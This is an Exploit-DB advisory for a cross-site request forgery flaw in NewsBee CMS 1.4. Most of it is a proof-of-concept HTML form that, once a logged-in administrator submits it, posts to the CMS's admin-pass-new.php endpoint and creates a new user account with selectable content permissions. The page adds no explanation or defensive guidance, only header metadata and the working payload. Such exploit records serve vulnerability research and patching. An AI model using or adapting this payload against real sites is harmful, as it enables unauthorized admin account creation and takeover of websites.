NewsBee CMS 1.4 - Cross-Site Request Forgery

EDB-ID: 44735
Author: indoushka
Published: 2018-05-23
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Author: indoushka 
# Tested on: windows 10 Français V.(Pro)
# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Dork: N/A

# PoC


<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>


<form action="http://Target/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">

<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">

<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">

<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC">&nbsp;</td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

</tbody></table>



<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">

<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>

<br>
</div>
</div>
</div>
</div>

Related Posts